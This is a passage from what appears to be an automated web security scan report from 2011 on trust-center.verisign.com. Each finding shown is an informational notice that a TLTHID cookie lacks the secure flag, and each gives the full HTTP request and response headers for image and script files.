Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 344
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 13169
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46
...[SNIP]...

6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a    .    .....Bv...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...

6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/truste.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2232
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0.
...[SNIP]...

6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;

6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 956
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....C............................................

       ..................C.......    ..

.......................................................'...................................
...[SNIP]...

6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 978
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .................................

............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .................................

............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 876
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....C............................................

.....................(............................... ...2......................U..........!"6AGu....123q.........?..Y...x.zWG
...[SNIP]...

6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/webtrust.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2221
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f.
...[SNIP]...

6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/account_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 741
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user
...[SNIP]...

6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/chat_support.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
